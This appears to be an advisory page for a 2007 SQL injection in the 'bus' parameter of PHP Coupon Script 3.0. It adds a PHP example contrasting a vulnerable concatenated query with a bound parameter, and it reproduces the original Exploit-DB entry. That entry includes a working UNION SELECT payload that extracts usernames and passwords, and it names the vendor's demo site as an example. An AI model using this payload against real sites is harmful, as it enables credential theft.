Vendor: PHP Coupon Script
By: Unknown
CVSS: 7.5 (HIGH)
Remote SQL Injection
CWE: 89
Product Name: PHP Coupon Script
Affected Version From: PHP Coupon Script 3.0
Affected Version To: PHP Coupon Script 3.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

PHP Coupon Script 3.0 Remote SQL Injection

PHP Coupon Script 3.0 is vulnerable to remote SQL injection through the 'bus' parameter of the 'index.php?page=viewbus' page. By manipulating that parameter, an attacker can inject SQL code and retrieve sensitive information from the database, such as usernames and passwords.

Mitigation:

The vendor should release a patch or update to fix the SQL injection vulnerability. In the meantime, users of the PHP Coupon Script 3.0 should be cautious and consider implementing additional security measures to protect against SQL injection attacks.
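
One such measure is to validate 'bus' as an integer and bind it as a query parameter instead of concatenating it into the SQL text. The following is an added example, not the vendor's code: the `businesses` and `users` schema, the function names and the in-memory SQLite database (via PDO) are assumptions made so the weak and hardened patterns can be compared side by side.

```php
<?php
declare(strict_types=1);

// Constructed stand-in schema; the real script's tables are not shown on the page.
function make_demo_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE businesses (id INTEGER PRIMARY KEY, name TEXT)');
    $db->exec('CREATE TABLE users (username TEXT, password TEXT)');
    $db->exec("INSERT INTO businesses VALUES (1, 'Demo Pizza')");
    $db->exec("INSERT INTO users VALUES ('admin', 'constructed-hash')");
    return $db;
}

// Weak pattern: the request value becomes part of the SQL text.
function view_bus_concat(PDO $db, string $bus): array
{
    $sql = "SELECT id, name FROM businesses WHERE id = $bus";
    return $db->query($sql)->fetchAll(PDO::FETCH_NUM);
}

// Hardened: accept only a positive integer, then bind it as a typed parameter.
function view_bus_bound(PDO $db, string $bus): array
{
    $id = filter_var($bus, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return []; // reject anything that is not a plain id
    }
    $stmt = $db->prepare('SELECT id, name FROM businesses WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

$db = make_demo_db();
// Constructed inputs: a normal id, and the page's payload shape cut down to two columns.
$inputs = ['1', '-1/**/union/**/select/**/username,password/**/from/**/users'];
foreach ($inputs as $bus) {
    echo "bus=$bus\n";
    echo '  concatenated: ', json_encode(view_bus_concat($db, $bus)), "\n";
    echo '  bound:        ', json_encode(view_bus_bound($db, $bus)), "\n";
}
```

With the concatenated query the second input returns the row from `users`; with the bound query it is rejected before any SQL runs.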
Source

Exploit-DB raw data:

==============================================

PHP Coupon Script 3.0 Remote SQL Injection

==============================================

Found: Cyber-Security.org

==============================================

Script site: http://www.couponscript.com/

==============================================

Exploit:
index.php?page=viewbus&bus=-1/**/union/**/select/**/null,null,null,username,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/users/*

==============================================

Example: http://www.couponscript.com/demo/

==============================================

# milw0rm.com [2007-05-03]